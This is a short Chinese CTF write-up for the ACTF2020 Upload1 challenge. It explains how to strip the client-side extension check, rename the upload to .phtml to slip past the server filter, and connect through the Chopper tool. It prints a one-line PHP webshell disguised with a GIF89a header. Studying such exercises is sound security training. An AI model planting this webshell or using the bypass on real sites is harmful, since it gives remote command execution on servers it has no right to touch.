文件上傳漏洞利用

以[ACTF2020 新生賽]Upload1為例


嘗試上傳PHP文件


發(fā)現(xiàn)前端頁面彈框,那么說明前端對文件后綴有限制,那么我們找到限制的地方刪掉限制


顯示錯誤信息,所以后端對文件也做了限制,那么我們嘗試繞過限制


設(shè)置文件名為:3.phtml成功繞過后端限制并且得到存儲文件的地方,所以我們用菜刀連接

所用的一句話為:GIF89a? <script language="php">eval($_REQUEST[shell])</script>



連接成功,在虛擬終端中輸入: cat /flag即可得到flag

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 前言: 實習工作以后,我才發(fā)現(xiàn)自己對于滲透測試還沒形成自己的測試體系,對于一些常見的漏洞測試方法了解得不夠全,更加...
    book4yi閱讀 2,450評論 0 3
  • 例題為:[極客大挑戰(zhàn) 2019]Upload 1 1、該題提示為圖片上傳,所以提示文件類型是 image/jpeg...
    滲透X甲乙丙閱讀 365評論 0 0
  • 文件上傳漏洞類型分類 如何判斷上傳漏洞類型? 本次實現(xiàn)使用的靶場系統(tǒng)是upload-labs upload-la...
    Admin3K閱讀 1,282評論 0 2
  • 本文使用環(huán)境來自于:https://github.com/c0ny1/upload-labs 客戶端 js檢查 一...
    Echocipher閱讀 10,460評論 0 2
  • 久違的晴天,家長會。 家長大會開好到教室時,離放學已經(jīng)沒多少時間了。班主任說已經(jīng)安排了三個家長分享經(jīng)驗。 放學鈴聲...
    飄雪兒5閱讀 7,865評論 16 22

友情鏈接更多精彩內(nèi)容